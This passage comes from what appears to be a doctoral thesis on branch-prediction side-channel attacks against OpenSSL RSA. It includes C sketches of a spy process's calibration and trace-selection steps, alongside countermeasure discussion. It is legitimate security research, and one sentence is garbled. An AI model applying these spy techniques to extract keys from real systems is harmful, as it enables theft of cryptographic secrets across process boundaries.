to detect an error and recover from a wrong decision without necessarily increasing
the sample size.
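The probability computation above can be checked numerically; the sketch below evaluates Φ through erf from the C math library.

    #include <stdio.h>
    #include <math.h>

    static double Phi(double x)              /* standard normal CDF */
    {
        return 0.5 * (1.0 + erf(x / sqrt(2.0)));
    }

    int main(void)
    {
        double muY = 58.91, muX = 1.24, sdY = 62.58, sdX = 34.78;
        double muZ = muY - muX;                     /* = 57.67 */
        double sdZ = sqrt(sdY * sdY + sdX * sdX);   /* = 71.60 */
        printf("Pr[Z > 0] = %.2f\n", Phi(muZ / sdZ));   /* about 0.79 */
        return 0;
    }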
Similarly, Figure 7.2 shows the single eviction method results. Since the resolution is much higher in the single eviction method, it is, as expected, much more
efficient than the total eviction method. A calculation similar to the one above
points to a success rate of 89%.
FIGURE 7.2. Practical results when using the single eviction method in attack
principle 2.
7.2.2. Results for Attack 4 = Trace-driven Attack against the
BTB (Asynchronous Attack)
To practically test attack 4, which is also an asynchronous attack, we
used an experimental setup very similar to the one described above. But instead
of a dummy process that blindly evicts the BTB entries, we used a real spy
function. The spy-process evicted the BTB entries by executing branches just
like the dummy process. Additionally, it also measured the execution time of
these branches. More precisely, it only evicted the entries in the BTB-set that
contains the target address of the RSA branch under attack and reported the
timing measurements. In this experiment, we examined the execution of the
conditional branch in the exponentiation routine and not the extra reduction
steps of Montgomery Multiplication.
We implemented the spy function in such a way that it only checks the
BTB at the beginning or early stages of each Montgomery multiplication. Thus,
we get exactly one timing measurement per Montgomery operation, i.e., multiplication or squaring. Therefore, we could achieve a relatively “clean” measurement
procedure. We ran our spy and the cipher process N many times, where N is
the sample size. Then we averaged the timing results taken from our spy to decrease the noise amplitude in the measurements. The resulting graph shown in
Figure 7.3 presents our first results for different values of N, clearly visualizing
the difference between squaring and multiplication.
FIGURE 7.3. Increasing gap between multiplication and squaring steps due to
missing BTB entries.
As said above, one can deduce very clearly from Figure 7.3 that there
is a stabilizing, significant cycle difference between the multiplication and squaring
steps during the exponentiation. Now that we have verified this BPU-related
gap between the successive multiplication and squaring steps during the exponentiation, we want to show how simple it is to retrieve the secret key with
attack principle 4. To do this, we simply zoom into Figure 7.4
with N = 10000 measurements. This yields the picture on the bottom of
Figure 7.4, showing the 89th to 104th Montgomery operations for N = 10000
measurements. Once such a sequence of multiplications and squarings is captured, it is a trivial task to translate this sequence into the actual values of the key
bits.
We would like to remark that the sample size of 10000 measurements
might appear quite high at first sight. But using some more sophisticated tricks
(which are out of the scope of this chapter) we could obtain a meaningful
square/multiply cycle gap using only a few measurements.
7.3. Conclusions and recommendations for further research
Along the theme of the recent research efforts to explore software side-channel attacks against commodity PC platforms, we have identified the branch
prediction capability of modern microprocessors as a new security risk which has
not been known so far. Using RSA, the most popular public-key encryption/signature
scheme, and its most popular open source implementation, OpenSSL, we have
shown that there are various attack scenarios in which an attacker could exploit a
CPU’s branch prediction unit. Also, we have successfully implemented a very
powerful attack (Attack 4 = Trace-driven Attack against the BTB, which even
has the power to break prominent side-channel security mechanisms like those
proposed by [52, 105]). The practical results from our experiments should
encourage thinking about efficient and secure software mitigations for this new kind of
side-channel attack. An interesting countermeasure that comes to mind is branch-less
exponentiation, also known as “atomicity”, c.f. [26]; a rough sketch of the general
idea is given below.
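The sketch removes the key-dependent branch structure from the exponentiation. It is a simplified "square-and-multiply-always" variant using a hypothetical big-number interface, not the atomicity method of [26] itself; its only purpose is to illustrate that the operation sequence can be made independent of the key bits.

    #include <stdint.h>

    /* Hypothetical big-number interface: mont_mul stands for Montgomery
     * multiplication modulo n, bn_copy_cond for a constant-time conditional
     * copy, bn_set_one for setting a value to 1. */
    typedef struct bignum BN;
    extern BN  *bn_new(void);
    extern void bn_set_one(BN *r);
    extern void mont_mul(BN *r, const BN *a, const BN *b, const BN *n);
    extern void bn_copy_cond(BN *dst, const BN *src, int cond);

    /* Square-and-multiply-always: every iteration performs one squaring and one
     * multiplication regardless of the key bit; the bit only selects, without a
     * branch on the secret, whether the product is kept.  dbits[0] is the most
     * significant exponent bit. */
    void exp_always(BN *r, const BN *m, const uint8_t *dbits, int len, const BN *n)
    {
        BN *tmp = bn_new();
        bn_set_one(r);
        for (int i = 0; i < len; i++) {
            mont_mul(r, r, r, n);              /* squaring, always performed       */
            mont_mul(tmp, r, m, n);            /* multiplication, always performed */
            bn_copy_cond(r, tmp, dbits[i]);    /* keep the product iff d_i == 1    */
        }
    }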
Another interesting research vector might be the idea of applying Branch
Prediction Attacks to symmetric ciphers. Although this seems a bit
odd at first sight, we would like to point out that an early study [44] also applied the Timing Attack scenario of Kocher [59] to certain DES implementations and identified
branches in the respective DES implementations as a potential source of information leakage. Paired with our improved understanding of branches and their
potential leakage of secrets, it might be a valid idea to try Branch
Prediction Attacks along the ideas of [44].
Similar to other very recent software side-channel attacks against RSA
and AES, c.f. [80, 67, 73, 5], our practically simplest attacks rely on a CPU’s
Simultaneous Multi-Threading (SMT) capability, c.f. [91]. While SMT seems at
first sight a necessary requirement of our asynchronous attacks, we strongly believe
that this is just a matter of clever and deep systems programming capabilities
and that this requirement could be removed along the lines of ideas mentioned in [48,
73]. Thus, we think it is of highest importance to repeat our asynchronous branch
prediction attacks also on non-SMT capable CPU’s.
FIGURE 7.4. Connecting the spy-induced BTB misses and the square/multiply
cycle gap.
8. ON THE POWER OF SIMPLE BRANCH PREDICTION
ANALYSIS
Deep CPU pipelines paired with the CPU’s ability to fetch and issue multiple instructions at every machine cycle led to the concept of superscalar processors.
Superscalar processors admit a theoretical or best-case performance of less than
1 machine cycle per completed instruction, c.f. [92]. However, the inevitably required branch instructions in the underlying machine languages were very soon
recognized as one of the most painful performance killers of superscalar processors. Not surprisingly, CPU architects quickly invented the concept of branch
predictors in order to circumvent those performance bottlenecks. Thus, it is not
surprising that there has been vibrant and very practical research on more and
more sophisticated branch prediction mechanisms, c.f. [78, 91, 92]. Unfortunately,
we identify branch prediction as a novel and unforeseen side-channel, thus being
another new security threat within the computer security field, c.f. Chapter 7.
We just recently discovered that the branch prediction capability, common
to all modern high-end CPU’s, is another new side-channel posing a novel and
unforeseen security risk. In [1, 7] and Chapter 7, we present different branch
prediction attacks on simple RSA implementations as a case study to describe
the basics of the novel attacks an adversary can use to compromise the security
of a platform. In order to do so, we start from an obvious attack principle and
gradually develop more and more sophisticated attack principles, resulting in four different
scenarios. To demonstrate the applicability of these attacks, we complement these
scenarios by showing the results of selected practical implementations of various
attack scenarios, c.f. Section 7.2.
Irrespective of our achievements, it is obvious that all of these attacks
still have the flavor of a classical timing attack against RSA. Indeed, careful examination of these four attacks shows that they all require many measurements
to finally reveal the secret key. In a timing attack, the key is obtained by taking
many execution time measurements under the same key in order to statistically
amplify some small but key-dependent timing differences, cf. [59, 34, 85]. Thus,
by simply eliminating the deterministic time dependency of the RSA signing process
on the underlying key, using very well understood and computationally cheap
methods like message blinding or secret exponent masking, c.f. [59], such statistical attacks are easy to mitigate. Therefore, it is quite natural to assume that such
timing attacks pose no real threat to the security of PC platforms.
Unfortunately, our results presented in this chapter teach us that this “let’s
think positive and relax” assumption is quite wrong! Namely, we dramatically improve upon the former result of [7] in the following sense. We prove that a carefully
written spy-process running simultaneously with an RSA-process is able to collect
during one single RSA signing execution almost all of the secret key bits. We call
such an attack, analyzing the CPU’s Branch Predictor states through spying on
a single quasi-parallel computation process, a Simple Branch Prediction Analysis
(SBPA) attack. In order to clearly differentiate those branch prediction attacks
that rely on statistical methods and require many computation measurements under the same key, we call those Differential Branch Prediction Analysis (DBPA)
attacks. However, in addition to that very crucial security implication (SBPA
is able to break even implementations which are assumed to be at least statistically secure), our successful SBPA attack also bears another, equally critical
security implication. Namely, in the context of simple side-channel attacks, it is
widely believed that equally balancing the operations after branches is a secure
countermeasure against such simple attacks, c.f. [52]. Unfortunately, this is not
true, as even such “balanced branch” implementations can be completely broken
by our SBPA attacks.
8.1. Multi-Threading, spy and crypto processes
With the advent of the papers [73, 80], a new and very interesting attack paradigm was initiated. It relies on the massive multi-threading
(quasi-parallel) capabilities of modern CPUs, whether hardware-managed or OS-managed, c.f. [67]. While purely single-threaded processors run threads/processes
serially, the OS manages to execute several programs in a quasi-parallel way, c.f.
[93]. The OS basically decomposes an application into a series of short threads
that are interleaved with other application threads. On the other side, there are also
certain processors, so-called hardware-assisted multi-threaded CPUs, which enable a much finer-grained quasi-parallel execution of threads, c.f. [92, 91]. Here,
some “cheap” CPU resources are explicitly doubled (tripled, etc.), while some
others are temporarily shared. This allows two or more processes to run quasi-parallel on the same processor, as if there were two or more
logical processors [92, 93]. This indeed allows a fine-grained, instruction-level
multi-threading, c.f. [92].
Irrespective of whether the CPU is single-threaded or hardware-assisted multi-threaded, some
logical elements are always shared, which enables one process to spy on another
process, as the shared CPU elements leak some so-called metadata, c.f. [73]. Of
course, the sharing of the resources does not allow a direct reading of the other
application’s data, as the memory protection unit (MMU or Virtual Machine)
strictly enforces application memory separation. One example of such a shared
element, which is the central point of interest for this chapter, is the highly complex
BPU of modern CPUs.
The new paradigm put forward by [73, 80], although already implicitly
pointed out by Hu [48], consists of quasi-parallel processes, called spy process and
crypto process. As the name suggests, the spy process tries to infer some secret
data from the crypto process executing in parallel by observing the leaked metadata.
In the most extreme and most practical scenario, both processes run completely
independently of each other, and this scenario was termed asynchronous attack
by [73].
Given the very complex process structures and their handling by a modern
OS, cf. [93], the following heuristic is quite obvious.
A hardware-assisted multi-threading CPU will simplify a successful spy process, as:
1. Some inevitable “noise” due to the respective thread switches will be
absorbed by the CPU’s hardware-assistance.
2. The instruction-level threading capability enhances the time-resolution
of the spy-process.
Otherwise, one needs very sophisticated OS and thread-scheduling expertise, cf. [67]. As the above paradigm and all its subtle implementation details heavily depend on the underlying OS, CPU type and frequency,
etc., we will not go deeper into those technical details here, and just assume the
existence of a suited spy process and a corresponding crypto process in a hardware-assisted multi-threading environment.
8.2. Improving Trace-driven Attacks against the BTB
In this section, we present our improvement over the DBPA attack from
[7], which we outlined in the previous chapter. However, in order to logically derive
our final successful SBPA result against some version of the binary square and
multiply exponentiation for RSA, we have to investigate the situation a bit deeper.
If we consider Figure 7.4, we can certainly draw the conclusion that from
spy processes like this, there is no hope for a successful SBPA. At first sight, this
looks quite astonishing for the following reason. In a certain sense, the trace-driven attack against the BTB from [7] is similar to the cache eviction attacks of
[80, 73, 67]. In these attacks, a spy process is also continuously testing, through
timing measurements, which of its private data had been evicted by the crypto
process. And especially in the RSA OpenSSL 0.9.7 case from [80], the measurement
exponentiation, i.e., inferring by simple time measurements which data the crypto
process had loaded into the data cache, to perform the RSA signing operation.
However, there is one fundamental difference, setting BPA attacks apart
from pure data cache eviction attacks. The BTB, although itself acting like a simple cache, is part of the instruction flow, which is
orders of magnitude more complicated than the data flow within the memory hierarchy,
i.e., between the L1 data cache and the main memory. Numerous architectural
enhancements take care that a deeply pipelined superscalar CPU like the Pentium 4
cannot be stalled too easily by a BTB miss. When considering just (what is
publicly known of) the Front-End Instruction Pipeline Stages between the Instruction Prefetching Unit and the resulting feeding into the so-called µop Queue, as
FIGURE 8.1. Front-End Instruction Pipeline Stages feeding the µop Queue
shown in Figure 8.1, we recognize that this Front-End Instruction
path alone is much more complicated than the data flow path, c.f. [91].
If we inspect Figure 8.1 in more depth, we can recognize that the
Pentium 4 has two different BTBs: a Front-End BTB and a Trace-Cache BTB.
As the architectural reasons for this second Trace-Cache BTB are outside the scope
of this chapter, we refer the interested readers to the literature on trace caches.
More interesting is the information on their sizes, and especially their
joint functionality, which we can partially learn from [91, pp. 913-914], “The travels
of a conditional branch instruction”: the Front-End BTB has a size of 4096 entries,
whereas the Trace-Cache BTB has only a size of 512 entries, i.e., the Front-End
BTB is a superset of the Trace-Cache BTB.
The most interesting conclusion that we can draw from this doubled BTB is the
following. Executing a certain sequence of branches in the spy process that
evicts just the Front-End BTB might not suffice to guarantee that
the CPU cannot find the target address of the target branch in any of the BTBs,
which is what forces the prediction to be not-taken. A certain hidden interaction between
the Front-End BTB and the Trace-Cache BTB might allow for some “short-term” victim
address evictions while still keeping the target branch stored in one of the BTBs.
Thus, we let the spy process continuously do the following: execute a certain fixed sequence of, say, t branches to evict
the target branch’s entry out of the BTB and measure the overall execution time of
all these branches. This is exactly what is done in our earlier attack except for a
single difference, which transforms our trace-driven attack from a DBPA attack
into an extremely powerful SBPA attack. The optimal value of t turns out to
be significantly larger than the BTB associativity, which is the value
used in our previous attack, c.f. [7] and Chapter 7. The increased value of t
guarantees the eviction of the target entry from all the different places that can store
it, e.g., from both the Front-End BTB and the Trace-Cache BTB.
The value of t also affects the cycle gap between squaring and multiplication
in the following way. As mentioned in the previous chapter, when the target branch
is evicted from the BTB and the branch turns out to be taken, a misprediction
will occur and the target address of the branch needs to be stored in the BTB. Then,
one of the spy branches has to be evicted from the BTB so that the new target
address can be stored. When the spy process re-executes its branches, it will
encounter a misprediction on the branch that has just been evicted.
A fact not mentioned above is that this misprediction will also
trigger further mispredictions, since the entry of the evicted spy branch needs to
be re-stored and another not-yet-reexecuted spy branch entry has to be evicted,
which will in turn cause other mispredictions. In the end, the execution time of this
spy step is expected to suffer from many misprediction delays, resulting in a high
gap between squaring and multiplication. However, this scenario only works out
if the entries are completely evicted from all possible locations. As can be seen in
Figure 7.4, the gap is only 20 cycles in the previous attack, which indicates that
the above scenario does not hold for that particular attack, or more precisely, for
that value of t. Increasing t to its optimal value enforces our scenario and
guarantees a very large gap composed of several misprediction delays. This is
clear considering the gap of around 1000 cycles in our SBPA attack, i.e., the improved
trace-driven attack.
The optimal value of t is eventually machine dependent and (most likely) also depends on the particular set of software, i.e., the OS, running on the machine. Therefore, an adversary needs to tune the spy process on the attack machine, e.g., by empirically determining the optimal value of t.
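One plausible way to perform this tuning is to calibrate against an exponentiation with a known exponent and keep the value of t that maximizes the gap between bit-1 and bit-0 iterations, as in the hypothetical sketch below. The helper run_sbpa_trace() is an assumed placeholder that performs one complete spy run with a t-branch eviction sequence and fills in the per-iteration timings; it is not part of the actual attack code.

#include <stddef.h>

#define MAX_BITS 4096  /* n_bits is assumed to be at most MAX_BITS */

/* Assumed helper: one spy run with a t-branch eviction sequence against an
 * exponentiation of n_bits bits; fills step_time[] with per-iteration timings. */
extern void run_sbpa_trace(int t, unsigned long long *step_time, size_t n_bits);

/* Sweep candidate values of t against a KNOWN exponent and return the value
 * that separates bit-1 from bit-0 iterations most clearly on this machine. */
static int calibrate_t(const unsigned char *known_bits, size_t n_bits)
{
    unsigned long long step_time[MAX_BITS];
    int best_t = 0;
    double best_gap = 0.0;

    for (int t = 16; t <= 4096; t *= 2) {   /* candidate sequence lengths */
        run_sbpa_trace(t, step_time, n_bits);
        double sum1 = 0.0, sum0 = 0.0;
        size_t n1 = 0, n0 = 0;
        for (size_t i = 0; i < n_bits; i++) {
            if (known_bits[i]) { sum1 += (double)step_time[i]; n1++; }
            else               { sum0 += (double)step_time[i]; n0++; }
        }
        double gap = (n1 && n0) ? sum1 / n1 - sum0 / n0 : 0.0;
        if (gap > best_gap) { best_gap = gap; best_t = t; }
    }
    return best_t;  /* use this t against the unknown key on the same machine */
}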
8.3. Practical Results
To validate our aforementioned enhanced “BTB eviction strategy”, we performed some practical experiments. As usual in this context, we have chosen to
carry out our experimental attacks in a popular simultaneous multithreading environment, c.f. [91], as this CPU type simplifies the context switching between
the spy and the crypto process. In our above outlined setting, the adversary can
apply this asynchronous attack without any knowledge of the details of the underlying branch prediction algorithm or of the deeper BTB structure.
As in our previous Branch Prediction attacks, we performed this attack on
a very simple RSA implementation that employed a square-and-multiply exponentiation and also Montgomery multiplication with dummy reduction. We used
the RSA implementation from OpenSSL version 0.9.7e as a template and made
some modifications to convert this implementation into the simple one as stated
above. To be more precise, we changed the window size from 5 to 1, removed the
CRT mode, and added the dummy reduction step. We used random plaintexts
generated by the rand() and srand() functions, as available in the standard C
library, and measured the execution time in terms of clock cycles using the cycle
counter instruction RDTSC, which is available at user level.
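For orientation, the kind of exponentiation routine targeted here has the following structure: left-to-right square-and-multiply with a single key-dependent conditional branch per exponent bit. The sketch below is purely illustrative; bignum_t, mont_mul(), bit() and assign() are hypothetical stand-ins for the modified OpenSSL big-number code (Montgomery multiplication with dummy reduction), and only the branch structure matters for the attack.

typedef struct bignum bignum_t;   /* opaque big-integer type (assumed) */

/* Assumed helpers standing in for the modified OpenSSL routines. */
void mont_mul(bignum_t *r, const bignum_t *a, const bignum_t *b,
              const bignum_t *n);                 /* r = a*b mod n */
int  bit(const bignum_t *e, int i);               /* i-th bit of e */
void assign(bignum_t *dst, const bignum_t *src);  /* dst = src */

/* Left-to-right square-and-multiply, window size 1: r = m^e mod n,
 * where e has nbits bits and its most significant bit is 1. */
void modexp(bignum_t *r, const bignum_t *m, const bignum_t *e,
            const bignum_t *n, int nbits)
{
    assign(r, m);
    for (int i = nbits - 2; i >= 0; i--) {
        mont_mul(r, r, r, n);        /* squaring: executed for every bit       */
        if (bit(e, i))               /* <-- the target branch spied on         */
            mont_mul(r, r, m, n);    /* multiplication: only when the bit is 1 */
    }
}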
The experimental results of this enhanced “BTB eviction strategy” for RSA-sign with a 512-bit key length are shown in Figure 8.2.

FIGURE 8.2. Results of SBPA with an improved resolution.
As recognizable from the above Figure 8.2, our repeated spy-execution of a
certain fixed sequence of branches certainly enhanced the resolution for one single
RSA-sign measurement. Indeed, comparing Figure 8.2 with Figure 7.4 we can
say that this simple trick “saved” averaging over about 1000 to 10000 different
measurements. However, although the results shown in Figure 8.2 weaken the
strength of the key tremendously, they do not give us enough information to
break the RSA key easily.
On an average PC (client or server) running Windows, Linux, etc. there are
many quasi-parallel processes running, whether system-processes or user-initiated
processes. The time when such processes are running can be assumed to be
random and heavily influences the timing behavior of every other process, e.g., our spy and crypto processes. Therefore, there is a statistical chance to perform
some of our measurements during a timeframe when such influences are minimal,
which leads us to our following heuristic:
there must exist among all those measurements also some quite “clear”
measurements.
We call this argument the time-dependent random self-improvement heuristic.
Applying this heuristic simply means that we just have to do some SBPA measurements, say at several independent times, and we can be sure that among those
there will be at least “one unusually good” individual measurement, which will
be our final SBPA measurement. To validate this heuristic, we then performed ten different
“random” SBPA attacks on the same 512 bit key. The results are given in Figure
8.3. Without doubt, there are quite different results among them although they
process the same key, thus supporting our heuristic quite well.

FIGURE 8.3. Enhancing a bad resolution via independent repetition.
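A minimal sketch of this repeat-and-select strategy is given below, assuming a helper run_one_sbpa() that performs one complete SBPA measurement of the signing operation. The clarity score (average distance of each step time from the threshold) is merely one plausible way to rank traces and is not the criterion used to produce the figures.

#include <stddef.h>

#define K             10     /* number of independent SBPA measurements */
#define MAX_STEPS     4096
#define GAP_THRESHOLD 500.0  /* cycles; illustrative, as above */

/* Assumed helper: one complete SBPA measurement of the same signing
 * operation, filling step_time[] with n per-iteration timings. */
extern void run_one_sbpa(unsigned long long *step_time, size_t n);

/* Rank a trace by how far its samples lie from the decision threshold;
 * cleaner (more bimodal) traces score higher. */
static double clarity(const unsigned long long *t, size_t n)
{
    double score = 0.0;
    for (size_t i = 0; i < n; i++) {
        double d = (double)t[i] - GAP_THRESHOLD;
        score += (d < 0.0) ? -d : d;
    }
    return score / (double)n;
}

/* Take K independent measurements and keep the clearest one. */
static void best_trace(unsigned long long *best, size_t n)
{
    unsigned long long cur[MAX_STEPS];
    double best_score = -1.0;

    for (int k = 0; k < K; k++) {
        run_one_sbpa(cur, n);
        double s = clarity(cur, n);
        if (s > best_score) {
            best_score = s;
            for (size_t i = 0; i < n; i++)
                best[i] = cur[i];
        }
    }
}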
And indeed, the following experimental result, also being among those
ten measurements, clearly shows that there is one exceptionally clear one, which
directly reveals almost all of the secret key bits.

FIGURE 8.4. Best result of our SBPA against OpenSSL RSA, yielding 508 out of 512 secret key bits.
Armed with this final experimental result, we can safely claim that we have
lifted our work of [7] to the much more powerful SBPA area.
8.4. Conclusions
Branch Prediction Analysis (BPA), which recently led to a new software
side-channel attack, still had the flavor of classical timing attacks against RSA.
Timing attacks use many execution-time measurements under the same key in order to statistically amplify some small but key-dependent timing differences. We
have dramatically improved our former results presented in [7, 1] and the previous
chapter and showed that a carefully written spy process running simultaneously with an RSA process is able to collect, during one single RSA signing execution, almost all of the secret key bits. We call this attack, analyzing the CPU’s Branch
Predictor states through spying on a single quasi-parallel computation process,
a Simple Branch Prediction Analysis (SBPA) attack — sharply differentiating it
from those relying on statistical methods and requiring many computation
measurements under the same key. The successful extraction of almost all secret
key bits by our SBPA attack against an OpenSSL RSA implementation proves
that the often recommended blinding or so-called randomization techniques to protect RSA against side-channel attacks are, in the context of SBPA attacks, totally useless. In addition to that very crucial security implication, targeted at such implementations which are assumed to be at least statistically secure, our successful SBPA attack also bears another equally critical security implication. Namely,
in the context of simple side-channel attacks, it is widely believed that equally
balancing the operations after branches is a secure countermeasure against such
simple attacks. Unfortunately, this is not true, as even such “balanced branch” implementations can be completely broken by our SBPA attacks. Moreover, despite
sophisticated hardware-assisted partitioning methods such as memory protection,
sandboxing or even virtualization, SBPA attacks empower an unprivileged process
to successfully attack other processes running in parallel on the same processor.
Thus, we conclude that SBPA attacks are much more dangerous than previously
anticipated, as they obviously do not belong to the same category as pure timing
attacks.
More importantly, since our new attack requires only one single execution observation, and thus significantly differs from the earlier timing attacks,
the SBPA discovery opens new and very interesting application areas. It especially endangers those cryptographic/algorithmic primitives whose nature is an intrinsic and input-dependent branching process. Here, we especially target the
modular reduction and the modular inversion part. In practical implementations
of popular cryptosystems, they are often used in such cases, where one parameter
of the respective algorithm (i.e., modular reduction or modular inversion) is an
important secret parameter of the underlying cryptosystem. Let us briefly mention a few important situations for reduction and inversion where a successful SBPA attack can lead to a serious security compromise; a sketch of such an input-dependent branching pattern is given after the list below.
• Modular reduction (mod p and mod q) is used in the initial normalization
process of RSA when using the Chinese Remainder Theorem, c.f. [64]. And
indeed, [51, 53] already pointed out that the classical pencil-and-paper division algorithm could leak the secret knowledge of p and q through certain side channels.
• Inversion is also very often used as a statistical side channel attack countermeasure to blind messages during RSA signature computations, cf. [59, 85],
thus effectively combating classical timing attacks, cf. [21].
• Inversion is the main ingredient during the RSA key generation set-up to
compute the secret exponent from the public exponent and the totient function of the respective RSA modulus.
• Inversion is also used in the (EC)DSA, cf. [64], and just the leakage of a few
secret bits of the respective ephemeral keys, cf. [47, 69, 70], leads to a total
break of the (EC)DSA.
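To illustrate why such inversion routines are natural SBPA targets, the following sketch shows a textbook binary modular-inversion algorithm over machine-word operands (a simplification of what big-number libraries do): every iteration's taken/not-taken pattern depends directly on the bits of the secret operand a, so observing the branches reveals information about a. This is a generic illustration, not code taken from any of the implementations discussed above.

#include <stdint.h>

/* Binary modular inversion: returns a^-1 mod p for odd p with gcd(a, p) = 1;
 * assumes p < 2^63 so the signed intermediates below cannot overflow.
 * The sequence of taken branches (the "u even" / "v even" / "u >= v" tests
 * and the parity tests on x1, x2) is determined by the secret input a,
 * which is exactly what a branch-prediction side channel can observe. */
uint64_t mod_inverse(uint64_t a, uint64_t p)
{
    uint64_t u = a, v = p;
    int64_t x1 = 1, x2 = 0;

    while (u != 1 && v != 1) {
        while ((u & 1) == 0) {                 /* branch depends on secret a */
            u >>= 1;
            x1 = (x1 & 1) ? (x1 + (int64_t)p) >> 1 : x1 >> 1;
        }
        while ((v & 1) == 0) {
            v >>= 1;
            x2 = (x2 & 1) ? (x2 + (int64_t)p) >> 1 : x2 >> 1;
        }
        if (u >= v) {                          /* branch depends on secret a */
            u -= v;
            x1 -= x2;
            if (x1 < 0) x1 += (int64_t)p;
        } else {
            v -= u;
            x2 -= x1;
            if (x2 < 0) x2 += (int64_t)p;
        }
    }
    return (u == 1) ? (uint64_t)x1 : (uint64_t)x2;
}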
Classical timing attacks cannot compromise such operations solely because
they rely on capturing many measurements and statistical analysis with the same
input parameters, whereas the above situations execute the reduction or inversion
part only once for a specific input set. We feel that our findings will eventually
result in a serious revision of current software for various public-key cryptosystem
implementations, and that there will arise a new research vector along our results.
9. CONCLUSION
Side-channel cryptanalysis has attracted significant attention since
Kocher’s discoveries of timing and power analysis attacks [59, 60]. Classical cryptography, which analyzes cryptosystems as perfect mathematical objects and ignores the physical analysis of their implementations, fails to identify side-channel leakages. Therefore it is necessary to utilize both classical cryptography
and side-channel cryptanalysis in order to develop and implement secure systems.
The initial focus of side-channel research was on smart card security. Smart
cards are used for identification or financial transactions and therefore need built-in security features. They store secret values inside the card and they are especially
designed to protect and process these secret values. The recent promises from
the Trusted Computing community indicate the security assurance of storing such
secret values in PC platforms, c.f. [99]. These promises have made the side-channel
analysis of PC platforms as desirable as that of smart cards.
We have seen an increased research effort on the security analysis of the
daily life PC platforms from the side-channel point of view. Here, it has been
especially shown that the functionality of the common components of processor
architectures creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which
comes in different forms. Although the cache itself has long been known to be a crucial security risk of modern CPU’s, c.f. [95, 48], the works [5, 14, 73, 80] were the first to prove such vulnerabilities practically and raised large public interest in them. These advances initiated a new research vector to identify,
analyze, and mitigate the security vulnerabilities that are created by the design
and implementation of processor components.
Especially in the light of ongoing Trusted Computing efforts, c.f. [99], which
promise to turn the commodity PC platform into a trustworthy platform, c.f. also
[25, 35, 42, 79, 99, 103], the formerly described side channel attacks against PC
platforms have significant importance. This is due to the fact that side channel
attacks have been completely ignored by the Trusted Computing community so
far.
Even more interesting is the fact that all of the above pure software side
channel attacks also allow a totally unprivileged process to attack other processes
running in parallel on the same processor (or even remotely), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. This particularly means that side channel attacks render all of the sophisticated protection mechanisms, such as those described in [42, 103], useless. The
simple reason for the failure of these trust mechanisms is that the new side-channel
attacks simply exploit deeper processor ingredients that are below the trust architecture boundary, c.f. [81, 42].
In this thesis, we have focused on side-channel cryptanalysis of cryptosystems on commodity computer platforms. Especially, we have analyzed two main
CPU components, the cache and the branch prediction unit, from the side-channel point of view. We have shown that the functionalities of these two components create very serious security risks in software systems, especially in software-based cryptosystems.
We have presented the first realistic remote attack on computer systems,
which was developed by Brumley and Boneh [21], and proposed an improved version
of this original attack. Our proposals improve the efficiency of this attack by a
factor of more than 10.
Then we have presented current cache attacks in the literature to give the
reader a brief overview of the area. We also have introduced a new cache timing
attack on AES that can compromise remote systems. None of the previous cache attack works could achieve the ultimate goal of devising a realistic remote attack. We
have discussed how one can devise and apply such a remote cache attack. We
have presented those ideas in Chapter 5 and showed how to use them to develop
a universal remote cache attack on AES. Our results prove that cache attacks
cannot be considered as pure local attacks and they can be applied to software
systems running over a network.
We have also analyzed trace-driven cache attacks, which are one of three
types of cache attacks identified so far. We have constructed an analytical model
for trace-driven attacks that enables one to analyze such attacks on different
implementations and different platforms, c.f. Chapter 6. We have developed very
efficient trace-driven attacks on AES and applied our model on those attacks as
a case study.
Furthermore, we have identified branch prediction units of modern computer systems as yet another unforeseen security risk even in the presence of recent
security promises for commodity platforms from the Trusted Computing area. We
have developed various attack techniques that rely on the functionality of branch
prediction units. We have shown that those attacks can practically extract the
secrets of public-key cryptosystems.
Moreover, we have shown that a carefully written spy process running simultaneously with an RSA process is able to collect, during one single RSA signing execution, almost all of the secret key bits. We call this attack, analyzing the CPU’s Branch Predictor states through spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack — sharply differentiating it from those relying on statistical methods and requiring many
computation measurements under the same key.
The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so-called randomization techniques to protect RSA against
side-channel attacks are, in the context of SBPA attacks, totally useless.
In addition to that very crucial security implication, targeted at such implementations which are assumed to be at least statistically secure, our successful
branch prediction attacks also bear another equally critical security implication.
Namely, in the context of simple side-channel attacks, it is widely believed that
equally balancing the operations after branches is a secure countermeasure against
such simple attacks. Unfortunately, this is not true, as even such “balanced
branch” implementations can be completely broken by our attacks. Moreover,
despite sophisticated hardware-assisted partitioning methods such as memory protection, sandboxing or even virtualization, SBPA attacks empower an unprivileged
process to successfully attack other processes running in parallel on the same processor. Thus, we conclude that branch prediction attacks are extremely dangerous,
as they obviously do not belong to the same category as pure timing attacks.
More importantly, since our new attack requires only one single execution observation, and thus significantly differs from the earlier timing attacks,
the SBPA discovery opens new and very interesting application areas. It especially endangers those cryptographic/algorithmic primitives whose nature is an intrinsic and input-dependent branching process. Here, we especially target the
modular reduction and the modular inversion part. In practical implementations
of popular cryptosystems, they are often used in such cases, where one parameter
of the respective algorithm (i.e., modular reduction or modular inversion) is an
important secret parameter of the underlying cryptosystem.
Potential cache-based security vulnerabilities have been known for a
long time, even though actual cache attacks were not implemented until recently.
There are many countermeasures that were proposed to prevent cache attacks
before 2005. However, there was no hint in the literature pointing out branch prediction as a potential side channel attack source. As a consequence, there was no effort to develop mitigation methods against branch prediction attacks. We have therefore developed several mitigations against this particular
security vulnerability. Branch prediction attacks also compromise secure systems
even in the presence of sophisticated partitioning techniques like memory protection and virtualization. Therefore it is crucial to employ mitigation methods against the vulnerabilities we have identified in order to achieve the promises of security-critical technologies like virtualization.
We believe that our findings presented in this thesis will eventually result
in a serious revision of current software for various cryptosystem implementations,
and that new research vectors will arise from our results.
BIBLIOGRAPHY
[1] O. Acıiçmez, Ç. K. Koç, and J.-P. Seifert. Predicting Secret Keys via Branch
Prediction. Topics in Cryptology — CT-RSA 2007, The Cryptographers’
Track at the RSA Conference 2007, M. Abe, editor, pages 225-242, Springer-Verlag, Lecture Notes in Computer Science series 4377, 2007.
[2] O. Acıiçmez, Ç. K. Koç, and J.-P. Seifert. On The Power of Simple Branch
Prediction Analysis. Cryptology ePrint Archive, Report 2006/351, October
2006.
[3] O. Acıiçmez and Ç. K. Koç. Trace-Driven Cache Attacks on AES. Cryptology
ePrint Archive, Report 2006/138, April 2006.
[4] O. Acıiçmez and Ç. K. Koç. Trace-Driven Cache Attacks on AES (Short
